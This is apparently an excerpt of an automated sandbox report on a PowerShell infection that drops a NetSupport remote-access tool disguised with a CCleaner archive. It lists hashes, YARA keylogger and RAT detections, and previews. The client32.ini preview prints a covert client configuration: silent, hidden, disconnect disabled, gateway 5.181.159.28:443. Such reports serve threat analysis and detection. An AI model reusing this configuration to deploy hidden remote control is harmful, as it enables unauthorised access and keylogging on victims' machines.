                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):19008
                            Entropy (8bit):5.5024520238798695
                            Encrypted:false
                            SSDEEP:
                            MD5:BB71E81B4666305496B90BAC25073A8D
                            SHA1:991E58C2F68B64D08D7E3F481E1EF81F70562CB4
                            SHA-256:75048145404E65C90FEE72F89B8A8AE4774EA501FAF3A89C8BCED98094F3E140
                            SHA-512:076EACF715F5515857D17AC1D002EA7A8225C5D2880BB86FC4E64AA16928EAD4FC5A410A60EBFA458F5B6E7FE1FE5DF3BBCBA36B48A4A223105436022689F213
                            Malicious:false
                            Reputation:unknown
                            Preview:@...e..............."................................@..........H...............o..b~.D.poM...3..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....`.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrxzavvq.rcd.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:unknown
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Roaming\RYMB15\CCleaner.zip

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):2594677
                            Entropy (8bit):7.997703048460563
                            Encrypted:true
                            SSDEEP:
                            MD5:84F0AC530280471801D3C9BABD74EEFF
                            SHA1:120124F92602E03EB7ADE7AC6DCC937C3591281A
                            SHA-256:A919586EF0C34B71244213D507B7C7001CE01071F9B2D4FE537C0F4AFCB393F0
                            SHA-512:D49CAAF8EA5C9E0A625E59DDCBC37488C4975912D0D539C7E777442E8B21804E6A4D4A55F0A2733991277E82BC43ECA6E591F4ACA69CC19DDBA75CB386529C97
                            Malicious:false
                            Reputation:unknown
                            Preview:PK.........DWW..%.&l..........client32.exe.|.xT.....N..".R....A.W..@........Tj.$...Q.@... ...7!...@..iJ.......;3....R..~.....;g...3gfnx...T.@......b../....d.@...n{...ts....5d.....]%.i..v...:3lZ..i]G.9v.:...\__...F.).C....(..B..t..P.f....&..9..e.k9.:.K.X...8..`.@...Oph.@W...B.p....N.]A.....A^...!..Y..T...+..t........`..KUg.....`..]w..=k...g...7.......4<..=f..|..8T.."...z..:..ae>s.L.(....f.U.%=.).Iq.....T..px-..8G.G...`8.>{#.=....&B..G..)t........uY:R0..C.....C.........G......1r.e..K5HMop..ZJ..6.&...fM.........m....G..W.I0....hb.."NDS5...>MTz-.".i.....v..[..JC.dC........^4....4.W.U.SZ.'..........O...C.O.+..X...Cs.)S.L`3'8t.....Y..Te....~aS.G...M......9..g......0}.|-.;..N%....Hi......$.....kC..t..`..,..!&..X..$.6k..v....o_.I.......x......?_..'.A..../`S.b...u.].....t..9.6...g.l..|.2...Nte.}.N....]........)d..Q{.>g.p?G.O...g.......S.Z*.-.....^.......[......V..i...V.oh.~l+......R9.}W.F..q....4...._`G.CK..u.@l.....7l.W/..b.&... H.1..I.........

                            C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):328056
                            Entropy (8bit):6.7547459359511395
                            Encrypted:false
                            SSDEEP:
                            MD5:C94005D2DCD2A54E40510344E0BB9435
                            SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                            SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                            SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL, Author: Joe Security
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 13%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\RYMB15\LogoDev.png

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):24504
                            Entropy (8bit):7.872865717955356
                            Encrypted:false
                            SSDEEP:
                            MD5:B8F553FBD3DC34B58BC77A705711023D
                            SHA1:4AB1052F906FDA96F877E398426DA5646574C878
                            SHA-256:2761C60263A2919B856915BDD2A0604B7F0E56E59D893AB13CCCEF2B7C967229
                            SHA-512:15A1DF0DBB06B4BB64A2B8CD7AD22578292D5ECDEC64303350E027F9F87FA8A825CB1CC97F94862D8C235C85B0C79A4FEABFB89D9E0B77BE62AAB25785122A60
                            Malicious:false
                            Reputation:unknown
                            Preview:.PNG........IHDR...X...X......f...._.IDATx........................................................................................................................................................................................................................................................f...:.(L..A!..].'twW..3.2 ..........'k.]Kd.|...mz..U...Tu.L..~.W.Wc......................rv.iv%.q=....u..>.o.......k.y.wo........ .,...~..U..._.7/g.........m.....*w.`........p.....8...q.,.,.g....:Q.Rt....Ga.............Z..S+.....=.,....T.Ew.....0U..`.....S.......w....Va..#.|Mo.....eY.eY....m^....r.P..S{#......D.I.y..K.&&9....@...u.^...D.....U..l.keY.eY....rv.]..H..A....^..RpQ.)@,.Im..s.~.U.....,j....._m?.V...z95l}.,.,.P....b..R.>rV.Q_m.0....(.b..@.,./.T[.S;.X....`..w.,...j.o..M.......~^......0.8.....$][=`.V.)..O..1....+...3...eY.e.[.]....s...z.E\.I!G..;).'...d.m>..+w.M.=X.S......g.o.~0........j.{.hY.eY.7.................G..e(K...y..IL.F)g..{.....Z.J}...qn..+.%

                            C:\Users\user\AppData\Roaming\RYMB15\NSM.LIC

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):195
                            Entropy (8bit):4.924914741174998
                            Encrypted:false
                            SSDEEP:
                            MD5:E9609072DE9C29DC1963BE208948BA44
                            SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                            SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                            SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                            Malicious:true
                            Reputation:unknown
                            Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..

                            C:\Users\user\AppData\Roaming\RYMB15\NSM.ini

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Generic INItialization configuration [Features]
                            Category:dropped
                            Size (bytes):6458
                            Entropy (8bit):4.645519507940197
                            Encrypted:false
                            SSDEEP:
                            MD5:88B1DAB8F4FD1AE879685995C90BD902
                            SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                            SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                            SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                            Malicious:false
                            Reputation:unknown
                            Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                            C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18808
                            Entropy (8bit):6.292094060787929
                            Encrypted:false
                            SSDEEP:
                            MD5:104B30FEF04433A2D2FD1D5F99F179FE
                            SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                            SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                            SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL, Author: Joe Security
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 5%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3740024
                            Entropy (8bit):6.527276298837004
                            Encrypted:false
                            SSDEEP:
                            MD5:D3D39180E85700F72AAAE25E40C125FF
                            SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                            SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                            SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL, Author: Joe Security
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL, Author: Joe Security
                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL, Author: Joe Security
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 17%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):396664
                            Entropy (8bit):6.80911343409989
                            Encrypted:false
                            SSDEEP:
                            MD5:2C88D947A5794CF995D2F465F1CB9D10
                            SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                            SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                            SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL, Author: Joe Security
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 6%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\RYMB15\client32.exe

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):103824
                            Entropy (8bit):6.674952714045651
                            Encrypted:false
                            SSDEEP:
                            MD5:C4F1B50E3111D29774F7525039FF7086
                            SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                            SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                            SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe, Author: Joe Security
                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exe, Author: Joe Security
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 26%
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\RYMB15\client32.ini

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):668
                            Entropy (8bit):5.421028976210353
                            Encrypted:false
                            SSDEEP:
                            MD5:A7D077A1AA3244F7251C1F0FFE6B875F
                            SHA1:B32BA9DCAB9D5108B1B887E7DCEA339B7E5467D4
                            SHA-256:0EB705D2D4FABB4350C7C3BFD097EE2AD74DB89283B7B6BD35A6C89BFAEE7EB3
                            SHA-512:C4E6A7142A7CC29E188E791AD3834037F029C717BB58942DDA592732791D9EA056E84D27BF6A73D39E7C4ED98128236545B070D835208D75C83EBAD149ECB4B8
                            Malicious:false
                            Reputation:unknown
                            Preview:0x98cbab77....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=5.181.159.28:443..gskmode=0..GSK=GL=BDMGM;EACEKHK=ECAHB=B..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..

                            C:\Users\user\AppData\Roaming\RYMB15\delegatedWebFeatures.sccd

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:XML 1.0 document, ASCII text, with very long lines (15941), with CRLF line terminators
                            Category:dropped
                            Size (bytes):18112
                            Entropy (8bit):5.982171430913221
                            Encrypted:false
                            SSDEEP:
                            MD5:7FD9CD05F23D42FB6DEDA65BD1977AC9
                            SHA1:DF25A2C9E1E9FA05805DA69FF41337B9F59755FB
                            SHA-256:CA6C469655D4D0D7CE5BEB447DAB43048A377A6042C4800B322257567AC135D9
                            SHA-512:6AE8ADDF0C55058803305F937593BA02202C99639A572BE0CACBFDE598019CF8DB7067E0392BD66C43CF7D8780E454EC5E08D68BCFD491B60A450FFC280C81B8
                            Malicious:false
                            Reputation:unknown
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<CustomCapabilityDescriptor xmlns="http://schemas.microsoft.com/appx/2016/sccd" xmlns:s="http://schemas.microsoft.com/appx/2016/sccd">...<CustomCapabilities>....<CustomCapability Name="Microsoft.delegatedWebFeatures_8wekyb3d8bbwe"/>...</CustomCapabilities>...<AuthorizedEntities>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217ac722205d7729ba409148cfa9e6d9e5b1cb94eaff1"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217

                            C:\Users\user\AppData\Roaming\RYMB15\install\camera_mf_trace.wprp

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):24910
                            Entropy (8bit):5.246760185320695
                            Encrypted:false
                            SSDEEP:
                            MD5:8028AB84D61FC5E00FEEA816E1D1E293
                            SHA1:73F6340BE4C6B5AF09673DACDF1AAB7405B966AA
                            SHA-256:3F2EB6455F54365C27829F85DD64CA0BAFAA8577A6C8E79A54A6DD4C67DF6470
                            SHA-512:276DF846F72F2B410852F0709F3EFFD853C3B012E94A6A3DFFB364F9597D4CCFE453B6533CE7A67C9DCE5B829C0F96E9838A267269687213D996B60591C586F0
                            Malicious:false
                            Reputation:unknown
                            Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>..<WindowsPerformanceRecorder Version="1.0" Author="Microsoft Corporation" Comments="MF tracing profile" Company="Microsoft Corporation" Copyright="Microsoft Corporation" Tag="MFTrace">.. <Profiles>.. <EventCollector Id="EventCollector_Camera_MF_Trace" Name="MFTrace Event Collector">.. <BufferSize Value="1024" />.. <Buffers Value="3" PercentageOfTotalMemory="true" MaximumBufferSpace="192" />.. </EventCollector>.. <EventProvider Id="AuthUX_1" Name="3ec987dd-90e6-5877-ccb7-f27cdf6a976b" />.. <EventProvider Id="AuthUX_2" Name="41ad72c3-469e-5fcf-cacf-e3d278856c08" />.. <EventProvider Id="AuthUX_3" Name="4f7c073a-65bf-5045-7651-cc53bb272db5" />.. <EventProvider Id="AuthUX_4" Name="a6c5c84d-c025-5997-0d82-e608d1abbbee" />.. <EventProvider Id="AuthUX_5" Name="c0ac3923-5cb1-5e37-ef8f-ce84d60f1c74" />.. <EventProvider Id="AuthUX_6" Name="df350158-0f8f-555d-7e4f-f1151ed14299" />.. <EventProvider Id="Aut

                            C:\Users\user\AppData\Roaming\RYMB15\install\manifest.json

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):238
                            Entropy (8bit):4.824253848576346
                            Encrypted:false
                            SSDEEP:
                            MD5:442699C95B20A60470421C6A4D29960F
                            SHA1:C7317F2D2414C991C21205BA3C68A187B997E3C1
                            SHA-256:44844CF3DDE6E80087AE0E6BF0D9326D7EF7D23326D24AC83AF0850BE26923D2
                            SHA-512:C89CF089F7FEEB80C6DED11F1FCE84287ABE8216A6E05723D1A7FAF567C501C043CD1246FF8DBEE1240D2D79C41B698EF4CC3459589E68E5BFC5BED7FC3A150B
                            Malicious:false
                            Reputation:unknown
                            Preview:{. "name": "MEI Preload", . "icons": {}, . "version": "1.0.7.1652906823", . "manifest_version": 2, . "update_url": "https://clients2.google.com/service/update2/crx", . "description": "Contains preloaded data for Media Engagement".}.

                            C:\Users\user\AppData\Roaming\RYMB15\install\preloaded_data.pb

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):8254
                            Entropy (8bit):6.795641289553097
                            Encrypted:false
                            SSDEEP:
                            MD5:D5E4C2634EFF8A9B3FAF432BF406D6D1
                            SHA1:A691F5C9877079193C1F7DFB16DBC30BB0372EC9
                            SHA-256:C6070A157B4E28D16FBCCBD233E93846DDB070C85E1A1BC64469B7A5F1424FAD
                            SHA-512:B264E28AC8F111DF01C553445AADC7BCDB3F32A38A1A19D3F9D458270DFEAF80EFA7144407BD999892022AF9DDE9DBF8A0E19E7212720E1C6511EA9125AFB166
                            Malicious:false
                            Reputation:unknown
                            Preview:..@5..0@...@y@o@.AK@X@.@w.!@.@.@.A.A.@.@B@.@.@.<A.A2A_..6strea.....kpo..anim..^...elo.tele..g....pan..bancidiz...don...Ikor........D...ap.cuem...ukleren.squl......ve..vco.. ....sten.tid..+v........dou...myvrs..=bb.jl..#streamfai..P2...nkk........10...f..R527......p...7............85.231.223....11.90.159.13...movie..w23serie...3tv.co...h...pla...00mg...bstrea..W93.178.172.11...49.56.24.2...........secure...|qo.....routk..nitetv.roge..}map...ndavide..ci.t...view.abc.ne..O...j....lianonlinenetw............r..'oora4liv......8.topgir..33.sogirl..rshow12...ayospor.......mc..s...k......sian..nime.c..n......prof..ba..Mtochk..Zkra..Tg...-....K............@.'..2.vos......m..rig...r.. ......@g..>..........perpl..)...tualpi...gintvgo.virginme...eo...mbox.skyen..@aplay.O.E0B...d....W......portal.jo.._...e...ma..........Lsearch.ya...frida......a..Qhnex..jvarzes..ey...........e....y...d.tv...stfr......l......seigr..U...d...q.....z....serial...r...cuevana..Amovistarplu..a.......f

                            C:\Users\user\AppData\Roaming\RYMB15\install\zh-CN.pak

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):439717
                            Entropy (8bit):6.67922802127972
                            Encrypted:false
                            SSDEEP:
                            MD5:17CA9A0F4EAAE3EEDD5B9E666E42A334
                            SHA1:A9CE1E52E0395EABB3AD63CBF89BC9935479E506
                            SHA-256:271AEFA63F3E7DC9B42FA4DD5668A7D206A1B926FCD6FBBAF3D82B47B9F6411B
                            SHA-512:11012A3B5F5A66CA82BEDE1155748CA6AAA246D6BDFA381CC2C199AF12862759434F31FA55FCFD2619A486579BB838B2BCF2486BA9DDACD7A7DB73124B4551D2
                            Malicious:false
                            Reputation:unknown
                            Preview:........."..e.....g.....h.....i.....j.....k.....l.....m.....o.....p.....q.....r.....s.....t.....v.....w.....|.%...}.7.....?.....G.....R.....Z.....i.....n.....v.....}...............................................P...........1.....C.................&.....2.................3.....E.................F.....[.................).....5.............................`.......................`.......................|.......................m.......................S.......................Z.......................].............................g.......................,.....L.....[...........&.....c.....u.................C.....O................./.....;.............................e.......................h.................'.....y.......................P.......................B.......................%.....t.......................W.....q.....}...........6....._.....q...........3.....h.................q.................6.......................E.............................\.....z.................=.....j.....|.

                            C:\Users\user\AppData\Roaming\RYMB15\install\zh-TW.pak

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):435853
                            Entropy (8bit):6.685926193725767
                            Encrypted:false
                            SSDEEP:
                            MD5:1404C2A11F3810B9A4CC3CB80EF00AB7
                            SHA1:2AB7C083C0D17B6EC9D56B05230EE8216D3C9B54
                            SHA-256:A9BC565A3B36A42FE4F0BECFFCE1E4A7EF343E82220D97A19B92970343661D26
                            SHA-512:EC9BFAB9101A676FA035DB1DECC4700FC5D71DA4D7BDBA2F0872802768BCCE184F5F8C9BA27CADE733E8D1EBD8BCC6CB55746801EA8F6C5E1088E1453B11B1E3
                            Malicious:false
                            Reputation:unknown
                            Preview:........o"..e.@...g.M...h.S...i.d...j.h...k.w...l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}...................'...../.....6.....=.....D.....F.....K.....T.....`.....o.....~...........n.......................f.......................[.......................O.....|.................6....._.....k.................(.....5.......................%.......................&.............................g.......................V.......................l.................&.....r.......................$.....p.......................;.....^.....m.................>.....J.......................'.............................h.......................@.......................1.......................'.....m.......................3.....M.................1.....C.................!.....D.............................E.......................0.....|.................9.......................t.................%.............................P.............................]...................

                            C:\Users\user\AppData\Roaming\RYMB15\install_state.json

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF, LF line terminators
                            Category:dropped
                            Size (bytes):1794
                            Entropy (8bit):3.5509498109363986
                            Encrypted:false
                            SSDEEP:
                            MD5:3F78A0569C858AD26452633157103095
                            SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                            SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                            SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                            Malicious:false
                            Reputation:unknown
